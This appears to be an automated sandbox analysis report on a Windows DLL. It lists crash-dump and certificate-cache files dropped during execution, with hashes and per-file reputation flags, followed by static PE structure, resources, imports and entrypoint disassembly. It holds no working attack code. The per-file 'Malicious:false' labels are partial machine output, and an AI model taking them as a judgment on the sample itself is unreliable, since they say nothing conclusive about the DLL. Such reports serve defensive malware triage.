                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.7.3.1.5.0.5.9.4.5.5.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.7.3.1.5.7.0.4.7.6.4.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.f.d.e.b.a.6.-.8.6.d.4.-.4.2.3.4.-.a.e.b.2.-.f.5.9.c.0.0.2.8.b.a.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.a.b.4.4.a.2.-.2.0.2.9.-.4.5.2.7.-.8.2.b.3.-.b.3.7.5.d.1.a.4.a.4.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.0.-.0.0.0.1.-.0.0.1.7.-.f.f.e.a.-.5.1.8.5.1.8.b.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER920C.tmp.dmp
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Tue Sep 28 03:25:52 2021, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):47174
                                          Entropy (8bit):2.1285698716091583
                                          Encrypted:false
                                          SSDEEP:192:eBMDuCZlbO159VxXbT/H8CBpq1WGUQMU8SvXnz4mxAW6QXuSnBLi:3/O159VxcmsPUjU8SvXn1xAYXY
                                          MD5:635AC1CD937C4ED884BD1597EE7BB19D
                                          SHA1:F411D609B2429B882A90022E40D47E7D11BFC675
                                          SHA-256:4F90BA2058C3751B13E86B58E36254C9099E998A973BBD1F94DFEE1AC251D9A3
                                          SHA-512:F9438D5CC0D40F4554D02E60D11D35B02B24BA1C429191D878B0FCE4D8273A5CB3BE65D58A7E8157829F552FF17F5A1D770FC933E02A3B5C9B122FEE4122564B
                                          Malicious:false
                                          Reputation:low
                                          Preview: MDMP....... .......@.Ra...................U...........B....... ......GenuineIntelW...........T....... ...7.Ra.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B45.tmp.WERInternalMetadata.xml
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8302
                                          Entropy (8bit):3.7004219106901513
                                          Encrypted:false
                                          SSDEEP:192:Rrl7r3GLNi9N6x6Yr+6fgmfTKS0Cprs89bqYsfGOm:RrlsNiH6x6Yy6fgmfTKSFqLf2
                                          MD5:B0C60ADA7ACC84BB76A937BD6E462BE9
                                          SHA1:AE976DC28574E4C6289F5DCE7D01F247D19325BA
                                          SHA-256:3F490F43C57126B74C38E209409B054AC062BA3571987F7016D1070EFB3C326A
                                          SHA-512:60D9F363AAFEC9226F09B75588ABE97886ABCAE2840ADC2E4DB041364637A29FDC604BA3EAC4E509DE323CDF1114C70FA20C2991C8EB87EE4221AE167B2BE84E
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.8.8.<./.P.i.d.>.......
                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E05.tmp.xml
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4670
                                          Entropy (8bit):4.499769207747317
                                          Encrypted:false
                                          SSDEEP:48:cvIwSD8zsh+JgtWI9PHWSC8B38fm8M4JCdskZFZ/+q8/OUI4SrSzd:uITfyA2SN6J6xWIDWzd
                                          MD5:59B8DDA35D74C8B446A03E4151C42BBF
                                          SHA1:D027BD07FF6DA891E751B51C62020FDF4460AAA1
                                          SHA-256:9FF7392F9F75347DF35384DF41EB348B5C74C8C6277A92C9EDBD34A893B85C15
                                          SHA-512:EED65DD074EA17A93339B90F83E467323EF7A297091FAFA2340A29BB99B63FA5800274837695FA1E54C324A70228A38201FF572E83BAC923254B063A221AACDE
                                          Malicious:false
                                          Reputation:low
                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1185876" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1391
                                          Entropy (8bit):7.705940075877404
                                          Encrypted:false
                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                          Category:dropped
                                          Size (bytes):61157
                                          Entropy (8bit):7.995991509218449
                                          Encrypted:true
                                          SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                          MD5:AB5C36D10261C173C5896F3478CDC6B7
                                          SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                          SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                          SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                          Malicious:false
                                          Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1306
                                          Entropy (8bit):7.470818786872256
                                          Encrypted:false
                                          SSDEEP:24:yvLxG88i7ZDlwjwN9CMDy0cjHbpLZ+cq0EoUbaeswo+Ks2FCU:UG8nZZVmNjHVM6Eos9jK5
                                          MD5:E829E65D7C4307D6FBC13C179E037A36
                                          SHA1:A053375BFE84E8B748782C7CEE15827A6AF5A405
                                          SHA-256:67ADD1166B020AE61B8F5FC96813C04C2AA589960796865572A3C7E737613DFD
                                          SHA-512:96C5793B2B57D8DF5891C94015720960E0DA4C2CF8CE1FC5707A0B46E5DB8CE3761FB5FDB430F619D1579F13E80FBDD973EF6A024129ED039AA193273158FCAD
                                          Malicious:false
                                          Preview: 0...0............+.J....S...%._Z0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...200904000000Z..250915160000Z021.0...U....US1.0...U....Let's Encrypt1.0...U....R30.."0...*.H.............0...........(........U.....zB..]&..+..L...k.u...G..U5W....9...<B.Nn.;.....\.Y8...i.Z.....$%..7q.........;ERE...S.4.R...`p.T..m...@4k+.f.f4|.k..W)..0.].ro....X=......+.....q].F..%...`guf.....\.S.:..G......w?.S......p...c.......S...H...i.%u...R...Q.............0...0...U...........0...U.%..0...+.........+.......0...U.......0.......0...U...........XV.P.@........0...U.#..0...y.Y.{....s.....X..n02..+........&0$0"..+.....0...http://x1.i.lencr.org/0'..U... 0.0.......http://x1.c.lencr.org/0"..U. ..0.0...g.....0...+..........0...*.H...............NG>...D...gx..c.uM..=3erT-...... ._.p..n;.^... ......<...9..|%.G.en?F....+.T....'K.../...q.J...#{.-...W>...3.G!x..'.*...\.d...y.O.mD.^.........D).Y .c.!..&..W..e..."...C....~...7.Z..0..n+*.!N....
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):192
                                          Entropy (8bit):2.7842198674325394
                                          Encrypted:false
                                          SSDEEP:3:kkFklRFw9NvfllXlE/zMciyJ1NNX8RolJuRdyo1dlUKlGXJlDdt:kKPS1iyJ7NMa8Rdy+UKcXP
                                          MD5:7AE616B55A29C8505F726240ABC85B0F
                                          SHA1:C1C46FA524580F4EBCA2107F4B751607F2F63933
                                          SHA-256:38AA9D7D5C2D9F877E73FCDD27D07BF46DAE6297530BA4B590DB2FA3F221BFAC
                                          SHA-512:D2F4FECF999AFF679DB7B3939B5EAD033B97F397EDA90E3B634B4ED54A5CAB7EEF523808C4668CE00B24B36EEB9F4BB7CE62AF52F7D1DD2EB1273329EBEEDFC3
                                          Malicious:false
                                          Preview: p...... .........A......(....................................................... ..........~...GW..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):326
                                          Entropy (8bit):3.0964598364242013
                                          Encrypted:false
                                          SSDEEP:6:kK75dFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:TX2kPlE99SNxAhUefit
                                          MD5:669EBA4F4FB6EF5A66277178DE9E2659
                                          SHA1:37698480F62DEC0AA1AC743D8789462789381182
                                          SHA-256:9BBCBCFDD718DE8CBD330333FEC94C4614CE16F8374B943431D5FA1CFBF28C6E
                                          SHA-512:5276F38E75F541CAA2F5F6EB62ED92B7B637FFE9049B5790D780CF208286ECAE407762CC83496C8B484A1E35D185DBFD32B68D6452778A043BDD44EE426F78F8
                                          Malicious:false
                                          Preview: p...... .........e......(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):192
                                          Entropy (8bit):2.7522317973800585
                                          Encrypted:false
                                          SSDEEP:3:kkFklnP9vvfllXlE/tdKje11U+lJuRdxPlIXlel9OlMHt:kKswoyUa8RdE169OlMN
                                          MD5:52B3591D077ADE6D088390032D66145E
                                          SHA1:1C0228694D9B32B76D37E72F3D7CCB257240AE35
                                          SHA-256:8EC8EB06F5C2AE3ADEDB131447832F35261102EC1B2CACF59D236847B60BAF1F
                                          SHA-512:46B1BC89A929B6F28BBDC26790455C2D43B6A20FE9D4E76571E13BD87307CE6FE29E956CA81BCEF8E7B8752909EF427E9D68B84A1C554A2A188DC5E15817051A
                                          Malicious:false
                                          Preview: p...... ................(....................................................... ..................................h.t.t.p.:././.r.3...i...l.e.n.c.r...o.r.g./...".6.0.2.7.2.6.5.0.-.5.1.a."...

                                          Static File Info

                                          General

                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):6.5524835197332045
                                          TrID:
                                          • Win32 Dynamic Link Library (generic) (1002004/3) 97.97%
                                          • Win32 Executable Delphi generic (14689/80) 1.44%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.20%
                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                          • DOS Executable Generic (2002/1) 0.20%
                                          File name:p2SijKiqgZ.dll
                                          File size:519145
                                          MD5:803768a34f7e59b8a9a2f3969624c47e
                                          SHA1:09a38940ef023929897fdc9c996de0b0f39116e2
                                          SHA256:2a0a88a2e5f9cafa10a48d63bdfcdf965b72c25978ab46cf28e795dbedc9624a
                                          SHA512:21e4aa621360a4ec4a0c73fad494e133f2584f92d058a72772e390c7bf1e1ad3e4d0778e95b590c663fe5efed3cfbecb08d5e78e1216c1bfbef729062806722f
                                          SSDEEP:12288:+xyHC8LAE/azElTT4c7Bo+526Tb/jXiQle601:eb8LxazE9X7C96Tz7iA/C
                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                          File Icon

                                          Icon Hash:b99988fcd4f66e0f

                                          Static PE Info

                                          General

                                          Entrypoint:0x459424
                                          Entrypoint Section:CODE
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                          DLL Characteristics:
                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:5097c68ca7573db2997ab353ba37473b

                                          Entrypoint Preview

                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          add esp, FFFFFFC4h
                                          mov eax, 004591ECh
                                          call 00007F8E14946101h
                                          xor ecx, ecx
                                          mov dl, 01h
                                          mov eax, dword ptr [00458C50h]
                                          call 00007F8E14987147h
                                          call 00007F8E14943EFEh
                                          nop
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5d0000x206e.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000x16400.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x6510.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          CODE0x10000x584480x58600False0.51845937942data6.53539139446IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          DATA0x5a0000x12380x1400False0.4306640625data4.0726295466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          BSS0x5c0000xc810x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .idata0x5d0000x206e0x2200False0.354319852941data4.89147485587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .reloc0x600000x65100x6600False0.630399816176data6.67541395632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                          .rsrc0x670000x164000x16400False0.602977966994data6.57916045616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_CURSOR0x67b6c0x134data
                                          RT_CURSOR0x67ca00x134data
                                          RT_CURSOR0x67dd40x134data
                                          RT_CURSOR0x67f080x134data
                                          RT_CURSOR0x6803c0x134data
                                          RT_CURSOR0x681700x134data
                                          RT_CURSOR0x682a40x134data
                                          RT_CURSOR0x683d80x134data
                                          RT_BITMAP0x6850c0x1d0data
                                          RT_BITMAP0x686dc0x1e4data
                                          RT_BITMAP0x688c00x1d0data
                                          RT_BITMAP0x68a900x1d0data
                                          RT_BITMAP0x68c600x1d0data
                                          RT_BITMAP0x68e300x1d0data
                                          RT_BITMAP0x690000x1d0data
                                          RT_BITMAP0x691d00x1d0data
                                          RT_BITMAP0x693a00x1d0data
                                          RT_BITMAP0x695700x1d0data
                                          RT_BITMAP0x697400xe8GLS_BINARY_LSB_FIRST
                                          RT_ICON0x698280x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 49, next used block 48059EnglishUnited States
                                          RT_DIALOG0x69b100x52data
                                          RT_STRING0x69b640x374data
                                          RT_STRING0x69ed80x1dcdata
                                          RT_STRING0x6a0b40x154data
                                          RT_STRING0x6a2080x240data
                                          RT_STRING0x6a4480x184data
                                          RT_STRING0x6a5cc0xe8data
                                          RT_STRING0x6a6b40x154data
                                          RT_STRING0x6a8080x498data
                                          RT_STRING0x6aca00x354data
                                          RT_STRING0x6aff40x3e8data
                                          RT_STRING0x6b3dc0x234data
                                          RT_STRING0x6b6100xecdata
                                          RT_STRING0x6b6fc0x1b4data
                                          RT_STRING0x6b8b00x3e4data
                                          RT_STRING0x6bc940x358data
                                          RT_STRING0x6bfec0x2b4data
                                          RT_RCDATA0x6c2a00x10data
                                          RT_RCDATA0x6c2b00x10c9adataDutchNetherlands
                                          RT_RCDATA0x7cf4c0x2ccdata
                                          RT_RCDATA0x7d2180x101Delphi compiled form 'TForm1'
                                          RT_GROUP_CURSOR0x7d31c0x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3300x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3440x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3580x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d36c0x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3800x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3940x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3a80x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_ICON0x7d3bc0x14dataEnglishUnited States

                                          Imports

                                          DLLImport
                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                          kernel32.dllTlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc
                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
